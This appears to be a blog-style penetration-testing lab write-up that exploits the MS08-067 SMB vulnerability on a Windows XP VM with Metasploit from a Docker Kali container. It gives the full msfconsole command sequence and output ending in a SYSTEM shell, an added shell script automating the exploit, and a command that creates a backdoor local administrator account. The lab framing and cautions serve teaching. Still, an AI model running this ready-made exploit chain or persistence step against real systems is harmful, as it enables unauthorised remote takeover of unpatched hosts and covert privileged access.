MS08-067 Vulnerability Penetration Test

My actual major is information countermeasures, yet I ended up doing PHP, which really isn't my proper line of work......
Recently I had to put together a vulnerability penetration-testing lab; once it was done I found it quite interesting, so I'm writing it up to share.

MS08-067 is a stack buffer overflow in the Server service's path-canonicalization routine (NetpwPathCanonicalize in netapi32.dll). An unauthenticated remote attacker can trigger it over SMB (TCP 445) through the SRVSVC RPC interface, which is why the Metasploit module used below needs nothing more than a reachable port 445. It affects every Windows version except Windows Server 2008 Core, including all editions of Windows 2000/XP/Server 2003/Vista/Server 2008, and even the pre-release Windows 7 Pre-Beta.

1. Set up the target machine
Download a Windows XP SP3 English ISO and install it in a VMware virtual machine. Target IP: 192.168.65.128. Keep this VM on an isolated (host-only or NAT) network: an unpatched XP SP3 box exposing port 445 can be exploited by anything that can reach it, not only by your Kali container.
2. Install Kali Linux and the Metasploit framework
Note: both the OS and the framework are installed through Docker here, so you need some familiarity with Docker first.
Start Docker and run docker pull kalilinux/kali-linux-docker to fetch the Kali Linux image (that image has since been retired; the current one on Docker Hub is kalilinux/kali-rolling).
Run docker run -it --name kali_linux -p 0.0.0.0:8080:80 kalilinux/kali-linux-docker /bin/bash
to create the container and attach to it interactively. Container IP: 172.17.0.2. Two things are worth noting: the -p 0.0.0.0:8080:80 mapping publishes the container's port 80 on every interface of the host, which this exercise does not need; and 172.17.0.2 is an address on Docker's private bridge that the XP target cannot reach, which is why a bind payload (Metasploit connects out to the target) is used below rather than a reverse shell.
Run git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit
to fetch the Metasploit framework (GitHub no longer serves the git:// protocol, so use https://github.com/rapid7/metasploit-framework instead). A source checkout also needs its Ruby gems installed with bundle install before it will start; on a Kali image, apt install metasploit-framework is the simpler route.
When that is done, cd ./metasploit to enter the framework directory and run ./msfconsole:

root@b2e6af248097:/metasploit# ./msfconsole

Once the console is up, proceed as follows:

msf5 > use exploit/windows/smb/ms08_067_netapi   # select the MS08-067 exploit module
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 172.17.0.2   # local host IP; only reverse payloads use it, the bind payload chosen below ignores it
LHOST => 172.17.0.2
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.65.128   # target host IP (msf5 accepts RHOST as an alias for RHOSTS)
RHOST => 192.168.65.128
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_bind_tcp   # payload: a cmd.exe listener on the target's TCP port 4444
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options   # review the configuration

Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.65.128   yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.65.128   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > exploit   # launch the attack

[*] 192.168.65.128:445 - Automatically detecting the target...
[*] 192.168.65.128:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.65.128:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.65.128:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.65.128:4444
[*] Command shell session 1 opened (172.17.0.2:37763 -> 192.168.65.128:4444) at 2018-11-09 09:59:01 +0000

C:\WINDOWS\system32>

The attack succeeded and we have a cmd shell on the target. The Server service runs as LocalSystem, so this shell is already NT AUTHORITY\SYSTEM: no credentials were needed and there is nothing left to escalate.
Next, create a user named xiayujie with password xiayujie and add it to the local Administrators group:
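The same msfconsole sequence driven from a resource file rather than typed by hand, as an added example that is not part of the original post. It assumes msfconsole is on PATH (set MSFCONSOLE to ./msfconsole when running from the source checkout inside the container); the function and variable names are my own. Beyond what the post shows, it validates the target address, port and pipe name before anything is sent, and adds a check mode that runs the module's own check command to fingerprint the target without triggering the overflow.

```shell
#!/bin/sh
# Added example (not from the original post): generate and run an msfconsole
# resource script for the MS08-067 bind-shell procedure described above.
# Assumes msfconsole is on PATH; override with MSFCONSOLE=./msfconsole if needed.

MSFCONSOLE=${MSFCONSOLE:-msfconsole}

# Return 0 if $1 is a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    IFS=. read -r _a _b _c _d <<EOF
$1
EOF
    for _octet in "$_a" "$_b" "$_c" "$_d"; do
        [ "$_octet" -le 255 ] || return 1
    done
    return 0
}

# Print an msfconsole resource script (one console command per line) to stdout.
#   $1 target IPv4 (RHOSTS)
#   $2 mode: check (fingerprint only) or exploit (default)
#   $3 bind port the payload listens on at the target (LPORT, default 4444)
#   $4 named pipe used to reach the Server service: BROWSER (default) or SRVSVC
gen_ms08_067_rc() {
    _rhost=$1; _mode=${2:-exploit}; _lport=${3:-4444}; _pipe=${4:-BROWSER}
    valid_ipv4 "$_rhost" || { echo "invalid target IP: $_rhost" >&2; return 1; }
    case $_mode in check|exploit) ;; *) echo "mode must be check or exploit" >&2; return 1 ;; esac
    case $_pipe in BROWSER|SRVSVC) ;; *) echo "SMBPIPE must be BROWSER or SRVSVC" >&2; return 1 ;; esac
    [ "$_lport" -ge 1 ] 2>/dev/null && [ "$_lport" -le 65535 ] \
        || { echo "LPORT must be 1..65535, got: $_lport" >&2; return 1; }

    printf '%s\n' \
        "use exploit/windows/smb/ms08_067_netapi" \
        "set RHOSTS $_rhost" \
        "set SMBPIPE $_pipe" \
        "set TARGET 0"
    if [ "$_mode" = check ]; then
        # The module's check handler fingerprints the target over SMB and reports
        # whether it looks vulnerable, without sending the malformed path.
        printf '%s\n' "check" "exit"
    else
        # Bind payload: Metasploit connects out to the target, so the container's
        # private bridge address (172.17.0.2 in the post) never has to be reachable
        # from the target and LHOST is not needed at all.
        printf '%s\n' \
            "set PAYLOAD windows/shell_bind_tcp" \
            "set LPORT $_lport" \
            "exploit -z"
    fi
}

# Write the generated script to a temp file and hand it to msfconsole -r.
run_ms08_067() {
    _rc=$(mktemp) || return 1
    gen_ms08_067_rc "$@" > "$_rc" || { rm -f "$_rc"; return 1; }
    "$MSFCONSOLE" -q -r "$_rc"
    rm -f "$_rc"
}

# Usage: sh ms08_067.sh run 192.168.65.128 check
#        sh ms08_067.sh run 192.168.65.128 exploit 4444 BROWSER
if [ "${1:-}" = run ]; then
    shift
    run_ms08_067 "$@"
fi
```

Run the check mode first; if the module reports the host as safe (a patched XP, or a Vista/2008 box where the fingerprint does not match a known target), nothing is gained by firing the exploit, and a failed trigger against the wrong build will usually crash the Server service rather than give a shell. The exploit mode leaves msfconsole at its prompt after the session opens, so attach to it with sessions -i 1 as in the post.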

C:\WINDOWS\system32>net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
The command completed successfully.   # account created and added to Administrators

With a SYSTEM shell you can do whatever you want on the host. Bear in mind that creating a local administrator is a loud, persistent change: it survives reboots and shows up in any review of local accounts, so in a real engagement record it in the report and remove the account again with net user's /delete switch once the test is finished.
